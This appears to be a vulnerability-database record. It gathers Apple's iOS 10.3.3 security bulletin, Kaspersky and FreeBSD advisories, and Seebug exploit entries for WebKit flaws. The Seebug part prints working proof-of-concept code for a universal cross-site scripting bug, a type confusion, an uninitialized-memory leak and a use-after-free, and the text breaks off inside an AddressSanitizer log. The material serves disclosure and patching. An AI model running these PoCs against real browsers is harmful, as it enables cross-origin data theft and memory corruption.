"2017-09-26T09:38:24", "published": "2017-09-26T09:38:24", "id": "APPLE:HT207924", "href": "https://support.apple.com/kb/HT207924", "title": "About the security content of tvOS 10.2.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:09", "bulletinFamily": "software", "cvelist": ["CVE-2017-7063", "CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7062", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-8248", "CVE-2017-7008", "CVE-2017-7038", "CVE-2017-7026", "CVE-2017-7056", "CVE-2017-7024", "CVE-2017-7055", "CVE-2017-7022", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7060", "CVE-2017-9417", "CVE-2017-7007", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7029", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7023", "CVE-2017-7066", "CVE-2017-7028", "CVE-2017-7058", "CVE-2017-7025", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7069", "CVE-2017-2517", "CVE-2017-7009", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7065", "CVE-2017-7047", "CVE-2017-7068", "CVE-2017-7030", "CVE-2017-7041", "CVE-2017-7027"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3.3\n\nReleased July 19, 2017\n\n**Contacts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-7062: Shashank (@cyberboyIndia)\n\n**CoreAudio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved bounds checking.\n\nCVE-2017-7008: Yangkang (@dnpushme) of Qihoo 360 Qex Team\n\n**EventKitUI**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: A remote attacker may cause an unexpected application termination\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-7007: Jos\u00e9 Antonio Esteban (@Erratum_) of Sapsi Consultores\n\n**IOUSBFamily**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7009: shrek_wzw of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7022: an anonymous researcher\n\nCVE-2017-7024: an anonymous researcher\n\nCVE-2017-7026: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7023: an anonymous researcher\n\nCVE-2017-7025: an anonymous researcher\n\nCVE-2017-7027: an anonymous researcher\n\nCVE-2017-7069: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-7028: an anonymous researcher\n\nCVE-2017-7029: an anonymous researcher\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Unpacking a maliciously crafted archive may lead to arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-7068: found by OSS-Fuzz\n\n**libxml2**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-7010: Apple\n\nCVE-2017-7013: found by OSS-Fuzz\n\n**libxpc**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7047: Ian Beer of Google Project Zero\n\n**Messages**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: A remote attacker may cause an unexpected application termination\n\nDescription: A memory consumption issue was addressed through improved memory handling.\n\nCVE-2017-7063: Shashank (@cyberboyIndia)\n\n**Notifications**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Notifications may appear on the lock screen when disabled\n\nDescription: A lock screen issue was addressed with improved state management.\n\nCVE-2017-7058: Beyza Sevin\u00e7 of S\u00fcleyman Demirel \u00dcniversitesi\n\nEntry updated July 28, 2017\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-2517: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Printing**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to an infinite number of print dialogs\n\nDescription: An issue existed where a malicious or compromised website could show infinite print dialogs and make users believe their browser was locked. The issue was addressed through throttling of print dialogs.\n\nCVE-2017-7060: Travis Kelley of City of Mishawaka, Indiana\n\n**Telephony**\n\nAvailable for: iPhone 5 and later, and Wi-Fi + Cellular models of iPad 4th generation and later\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-8248\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: Processing maliciously crafted web content may allow cross-origin data to be exfiltrated by using SVG filters to conduct a timing side-channel attack. This issue was addressed by not painting the cross-origin buffer into the frame that gets filtered.\n\nCVE-2017-7006: an anonymous researcher, David Kohlbrenner of UC San Diego\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed with improved frame handling.\n\nCVE-2017-7011: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content with DOMParser may lead to cross site scripting\n\nDescription: A logic issue existed in the handling of DOMParser. This issue was addressed with improved state management.\n\nCVE-2017-7038: Egor Karbutov (@ShikariSenpai) of Digital Security and Egor Saltykov (@ansjdnakjdnajkd) of Digital Security, Neil Jenkins of FastMail Pty Ltd\n\nCVE-2017-7059: Masato Kinugawa and Mario Heiderich of Cure53\n\nEntry updated July 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed through improved memory handling.\n\nCVE-2017-7064: lokihardt of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7012: Apple\n\n**Wi-Fi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7065: Gal Beniamini of Google Project Zero\n\nEntry added September 25, 2017\n\n**Wi-Fi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An attacker in Wi-Fi range may be able to cause a denial of service on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2017-7066: Gal Beniamini of Google Project Zero\n\nEntry added September 26, 2017\n\n**Wi-Fi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-9417: Nitay Artenstein of Exodus Intelligence\n", "edition": 3, "modified": "2020-07-27T08:16:12", "published": "2020-07-27T08:16:12", "id": "APPLE:HT207923", "href": "https://support.apple.com/kb/HT207923", "title": "About the security content of iOS 10.3.3 - Apple Support", "type": "apple", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:49:27", "bulletinFamily": "info", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "description": "### *Detect date*:\n07/19/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apple iTunes. Malicious users can exploit these vulnerabilities to execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nApple iTunes versions earlier than 12.6.2\n\n### *Solution*:\nUpdate to the latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[Apple security bulletin](<https://support.apple.com/en-us/HT207928>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2017-7041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7041>)9.3Critical \n[CVE-2017-7042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7042>)9.3Critical \n[CVE-2017-7043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7043>)6.8High \n[CVE-2017-7046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7046>)6.8High \n[CVE-2017-7048](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7048>)6.8High \n[CVE-2017-7049](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7049>)7.5Critical \n[CVE-2017-7052](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7052>)7.5Critical \n[CVE-2017-7053](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7053>)9.3Critical \n[CVE-2017-7055](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7055>)7.5Critical \n[CVE-2017-7056](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7056>)7.5Critical \n[CVE-2017-7061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7061>)7.5Critical \n[CVE-2017-7064](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7064>)4.3Warning \n[CVE-2017-7010](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7010>)6.8High \n[CVE-2017-7012](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7012>)6.8High \n[CVE-2017-7013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7013>)6.8High \n[CVE-2017-7018](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7018>)6.8High \n[CVE-2017-7019](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7019>)6.8High \n[CVE-2017-7020](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7020>)6.8High \n[CVE-2017-7030](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7030>)6.8High \n[CVE-2017-7034](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7034>)6.8High \n[CVE-2017-7037](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7037>)6.8High \n[CVE-2017-7039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7039>)6.8High \n[CVE-2017-7040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7040>)6.8High\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 45, "modified": "2020-06-18T00:00:00", "published": "2017-07-19T00:00:00", "id": "KLA11075", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11075", "title": "\r KLA11075Multiple vulnerabilities in Apple iTunes ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "description": "\nThe Webkit gtk team reports:\n\nPlease reference CVE/URL list for details\n\n", "edition": 6, "modified": "2018-03-28T00:00:00", "published": "2017-07-24T00:00:00", "id": "0F66B901-715C-11E7-AD1F-BCAEC565249C", "href": "https://vuxml.freebsd.org/freebsd/0f66b901-715c-11e7-ad1f-bcaec565249c.html", "title": "webkit2-gtk3 -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T11:56:35", "description": "JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called.\r\n\r\nThe PoC shows to call a setter of another origin's object.\r\n\r\n### PoC 1 - JSValue::putToPrimitive:\r\n```\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = 1.2;\r\n a.__proto__.__proto__ = f.contentWindow;\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n\r\n</script>\r\n</body>\r\n```\r\n\r\n### PoC 2 - JSObject::putInlineSlow:\r\n```\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = {\r\n __proto__: f.contentWindow\r\n };\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n</script>\r\n</body>\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive(CVE-2017-7037)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7037"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96298", "id": "SSV:96298", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:15:17", "description": "Let's start with JS code.\r\n```\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n}\r\n```\r\nWhen the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.\r\n\r\nHere's the code of BytecodeGenerator::emitGetByVal.\r\n```\r\nRegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)\r\n{\r\n for (size_t i = m_forInContextStack.size(); i > 0; i--) {\r\n ForInContext& context = m_forInContextStack[i - 1].get();\r\n if (context.local() != property)\r\n continue;\r\n\r\n if (!context.isValid())\r\n break;\r\n\r\n if (context.type() == ForInContext::IndexedForInContextType) {\r\n property = static_cast<IndexedForInContext&>(context).index();\r\n break;\r\n }\r\n\r\n ASSERT(context.type() == ForInContext::StructureForInContextType);\r\n StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(structureContext.index()->index());\r\n instructions().append(structureContext.enumerator()->index());\r\n instructions().append(profile);\r\n return dst;\r\n }\r\n\r\n UnlinkedArrayProfile arrayProfile = newArrayProfile();\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(arrayProfile);\r\n instructions().append(profile);\r\n return dst;\r\n}\r\n```\r\nThe method uses op_get_by_val to handle expressions like \"o[i]\". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that \"i\" will be a string(\"xx\") semantically. Therefore, it will use op_get_direct_pname to handle it.\r\n\r\nHere's another example.\r\n```\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n i = 0x123456; <<-------- (b)\r\n o[i]; <<-------- (c)\r\n}\r\n```\r\nIn this case, it will use op_get_direct_pname at (a). And at (b), since the index variable \"i\" is replaced, the invalidate method of the ForInContext object that makes \"context.isValid()\" return false is called. So, op_get_by_val will be used at (c).\r\n\r\nBut the problem is that it can't properly handle the following case which cause a type confusion.\r\n```\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.\r\n i = 0;\r\n }\r\n}\r\n```\r\n### PoC:\r\n```\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i];\r\n i = new Uint32Array([0, 1, 0x777777, 0, 0]);\r\n }\r\n}\r\n```", "published": "2017-10-10T00:00:00", "type": "seebug", "title": "WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal(CVE-2017-7061)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7061"], "modified": "2017-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96629", "id": "SSV:96629", "sourceData": "\n let o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i];\r\n i = new Uint32Array([0, 1, 0x777777, 0, 0]);\r\n }\r\n}\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96629"}, {"lastseen": "2017-11-19T11:56:46", "description": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of `JSArray::appendMemcpy`.\r\n```\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n```\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\n### PoC:\r\n```\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy(CVE-2017-7064)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7064"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96302", "id": "SSV:96302", "sourceData": "\n function optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96302", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T11:56:43", "description": "There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n\r\n### PoC:\r\n\r\n=================================================================\r\n```\r\n<script>\r\nfunction go() {\r\n li.hidden = true;\r\n dir.setAttribute(\"aria-labeledby\", \"map\");\r\n}\r\n</script>\r\n<body onload=go()>\r\n<dir id=\"dir\">\r\n<li id=\"li\">\r\n<map id=\"map\">\r\n<area></area>\r\n```\r\n=================================================================\r\n\r\n### ASan log:\r\n```\r\n=================================================================\r\n==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428\r\nREAD of size 8 at 0x6080000908a0 thread T0\r\n==728==WARNING: invalid path to external symbolizer!\r\n==728==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4)\r\n #1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) 